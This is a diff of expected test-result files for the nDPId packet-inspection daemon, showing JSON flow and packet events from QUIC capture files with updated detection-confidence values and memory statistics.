-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621516405234,"flow_last_seen":1621516405464,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"37b57e2a60f871d6f459268f91669a78","tls_supported_versions":"TLSv1.3"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621516392616,"flow_last_seen":1621516392956,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621516401935,"flow_last_seen":1621516402235,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1621516405234,"flow_last_seen":1621516405464,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4050,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":179,"packets-processed":178,"total-skipped-flows":0,"total-l4-payload-len":240300,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":112,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":112,"total-idle-flows":111,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":520,"global_ts_msec":1621521142479} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1621521142479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621521142479,"pkt":"AAAAAAAAAAEAS1QMCABFAAViSrhAAH4RDvqokEAFTOdoXOdGAbsFTt8wzP8AAB0IF8C5lRFZ4pEAAEU0ArfW5P1VplOmF6lJC6sD9FD5t7ksW3G6pIV+pxy8yJt6ChAKFxnQmbZIV9dRmn9\/GhICwwKjJ2FzV0KvCGLgZ6X+Mdfa6UbhiD5fnkjyzmiIAB9HARV9mwW0qWFR+1JZ0wBSXcVhsdD76Sf9pAJ1VTq0AAsSZXJGpY6+ga64ul50F4bjriucLzjYYNDw+HNSeQ06KntY3GZGimI9HLzbEr2ITrSYMZjOiiz48+8lDJD2UCwemzRbkRRjVcXHUb3Tc7AmoQBva7BoUSsAyx1+D5PZLPsFdXibn+bgqwT1LLMkHG9RRpo1Tt0gtl2pZ3bJxzRqJmP\/hGWMpoj6aUkAKucuXZomz1Q3f30mL0XyV\/0uY4\/XJg7V1OPue2C09RRuIDP1ooFtROu\/pDDI8HImrmKLKKL9dpKh9adfi5YYuPF4Is4HNqqqizalARCmdFSjpPpy98YfUSi2cVRDkchscThNdK38ko4V8Xy7wPkbIt0O9VavKfmHr39w5Ez1eaWFGZRrA0sn6GcPn8Dm2mBcIqBG5MQXN4W5fy1Y\/pT1svPFcC4q5\/EbD0QNn3Z9BNP8nBLiOsibf3MO3CFnOCJM1lkXUrVAGUZnjxGG+8QqLn4EDZelxu\/GTjx1L24MAsKjWwR\/o8CwEfewYTHjpSyuURWOKkKoimK1sbXS\/GUISZay6CW3ipWXDAWnzLjYcodUIMxsb6EXUcIWUdqRY3ypfHKYpkR2gJ8xECJ7AqLMiY6ZE2uxoDH2mplysDswerJmf0vlCYZjDi32D9NrSZoCZTUeWm4xfiTRs2WDrsd1DqSJwRmQac3\/k55LOe6c64B2i8EEyZy11iQXRTuxGAnfwPi7J2P7G5iOmklAoJzzL\/0e8gKlYQz1\/eyL8HHdtP9qbl5P1U5o8IfoTp\/dirgLtL\/sstyNOECz3S+ayZnviqEPhmw1cijJYWOrYO+8pc6zVY+d8ULBF\/1MP6ychzNJOS7uwIVz2UYuxjSek3ViUJolFI52vwDbTLtTK7tzBEeEdAEchicq0jw14m4HZ+e4tF+ukL7pInPzJ8wSVQteMvhcM05Lb5IMk0dp0n21Lhhxk4rfjW5o1Rx9yGagxsLW0M2mEMuP4yB02zIA7SbqYa7jGL8IZqDCmafSvYT3KeNsojBFm3l7E4ABP4OKSMnTDQnziym3spGoBu55cpHlCNnGIXsDXfxDbCuGO6UHeS1fMSqOZnhD\/oZDnP5dYfsIXucQnrcx7lxhddVt4WAUUkUstn0y6l\/ZI+n+V\/0pwNIHkKelqc8pvPNG+JI1PSwYT7AfrchIoFXExUQsiqKPMuonW36NpxM3LkCC\/aUwvKOHDe1CykT5CBTVTcvM6LiDoQeKOvHkAxU7lNkROINSK7LsZzcm53MqryrrO1UQHIMBmC2YTcM98zz7PGYSirT2iXt7W+8GhlTLOcB3tKQE+B8YL\/1\/AkWmWJZpkom5dDgbzqOZa+I8DdrHM7ji5OZONbEY9iRhxqtTq74iTkjQ5ERERvH0t6mntYj+OqsnNsbFzFwalVuNQrhXP+gbh5zien4KTygiyFYCjV+NChiZy8pxs1wT4ESZqkuqAehNcFqGsDoVgPoQOLhzIn\/DzItGeAiDrfHRixyOVU1EWsb7b30saK+ncY8sFqQNqA5lAl9gdLvQcfuDvdrDHmseBNqFM+55fa677QDOLLZ\/8MAydrSpxVKh5KZf++uVTUj630nVHiL+6S9majjl00xS38l2C9stuZ3K6Kgv+3rXBnYm4l74dpkK"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 6.1","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ogs.google.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 6.1","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621521142479,"flow_last_seen":1621521142479,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":59206,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621521142479,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00611{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":179,"packets-processed":179,"total-skipped-flows":0,"total-l4-payload-len":241650,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":113,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":113,"total-idle-flows":113,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":526,"global_ts_msec":1621521142479} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 179/179 @@ -532,9 +532,9 @@ ~~ total active/idle flows...: 113/113 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 7685036 bytes -~~ total memory freed........: 7685036 bytes -~~ total allocations/frees...: 121449/121449 +~~ total memory allocated....: 7818670 bytes +~~ total memory freed........: 7818670 bytes +~~ total allocations/frees...: 124211/124211 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 506 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/quic_interop_V.pcapng.out b/test/results/quic_interop_V.pcapng.out index 0d4fb8c75..815ba3017 100644 --- a/test/results/quic_interop_V.pcapng.out +++ b/test/results/quic_interop_V.pcapng.out @@ -2,275 +2,275 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1603816434507} 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gCq04BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdutiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMDyb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlauSw+hHEcI8MkM2s5oZz8Vly\/UrbvRIh+SQjHV9IgfXMkwlUO3sEi\/jyMwMDaEUvpg=="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA0WRAAEARMO3AqAGAR8opqZMLAbsE7E3SzgoKCgoINqH1Vk80LhQAAETSZtRDhHpK7xsUlJpSgtMoVla6Pas+BpVtN5Gjcd3BxSuPRtpK\/YBMJ9l2k8o2HThiUM\/fvgYuD2Kcrxorh\/jnb6Z8yLwnCqMFI6f5++2wq3UD\/j8Rm4jH0vTA53TCV8faPBmIbc\/\/f3Tz+R2DOXZgP62iVOiBptLL3IqVZOU4IOLE0\/JVkynYUJQnG0YsW4UK0qnbcWTyRdgTGBkMmMCcy0t6nX6Tgq0WiglTiACb2fNGAUM5xWmIp7l56ox3rxd5eSC\/ouvINjM5kG8P8v2tSujZgl86FeLWEME+DY5WH6KcXkEbr69+FbbuNXvDK2f590+AqasG+fI7zBfNWo1Ipsj7l1HkYvsUvIcw26BBQurqx8+tF7QthbMubN0aD8OhoOBolJfSbDzAs85Id6ivSBG9R0jYEyc3k1vljfz+fMsTaJHmT507adZ2GD7mZXjlqTo2tY0lxTmDq8TYIRmW5S0g5AxeLYESawu5tcDeQ1F0ZZz\/81pFA\/O6Xsz+LW+nkuPcxb3FhZQ8rGk11Nxnt5bl3qx9dkKg50nnHBStrKL99IkvRWEio2XD6zIDHeUPmuj6vbPMoqWbJ1BWc1QOP8zvT\/5Lum0urlm+3xs84QGqHVu2D75cOuwNNgNZCk5Ju4VXwD1CjjYHIrh0EPYz\/YpjMoCs1JdYRQApUEYvXPrOftFHyRWo2ChQb33MFXFQcv8wO2\/5aJKqYdcVeht\/\/qNdSsRFnrxK6h2aWdAQ4Z7JbsFvA\/hTb+VL5L9GCSqVojyjcvz6pXj+7VmERo1L+Pa9BRifjy0iLNfjP5wofltooS4BlzdCB4aUHHGlTH+J7RtfENSes5C1MkGk3bXd4a77aCZrF2RKt65BuGoTHxCIa46j\/b1GLm8VZzlNV59q4blAc5XL98HTRWrj7Lyc79Dh8jXnEXwPmDWmW9CsA4Ch4D72guVA+3h1lyEU8sU8aFmgHNkr\/q70G96HCmPexSIjjNAelbGlp4sZrLx47ftxlllSk4gO\/H46nyfjKhEcW56k2uyhm8V4HNNWN4MpbIc\/Yfvdrngx7qWGlmiM3iNJAh16I3SuDM9QVUwv5ATd2ADCULw+erv80Ft9CMpIikvknhfJ1tVT8peEKIqu9ABaR5GMoofySzXczjefzyNV1DG6SeWJ52+UthtjpveV9nHmvLuYXnvGea6FWcjL6o6DFccw\/MPYc1ZnxJKIVJl7s7PzYYTQJo6uzu7RffuRaN3XTJ5SsTndQcokexpIO49TaPuPvP71185NglDXOKS+OmNgUpybmlmuhSa5FYUv3bbW69PHc\/kF0xzXBLf5+J+46p3Nttr2OqPoeJohEZHRVI\/6AiZJhhgwvTHdeaUhk2xf9gKSkmNoHccjkKGyBBA6zyzqAsmTBzP1bnAJvuFd4p4mvR9AAMpTZsVCt4+YpaevXhHBN80S0SJnJ8GYSPTlTDk5S5LCl8ACcrSmYkJfN2QxrZnjAo\/7X0BI4v65EBgE0aBU2rS5E3V+L7+ROQByi56sXJjXQwyagtcG5I2ud7++g9fSmh383\/sJtnw8\/3hGH5RGGOTtYIFZs7aGYDtNUkdsTHzAAG0WjFBvyjkoOpP88ObPBQn3FH06fbbow+5Nw0s\/GK8dgRoDVdGM2xounw=="} 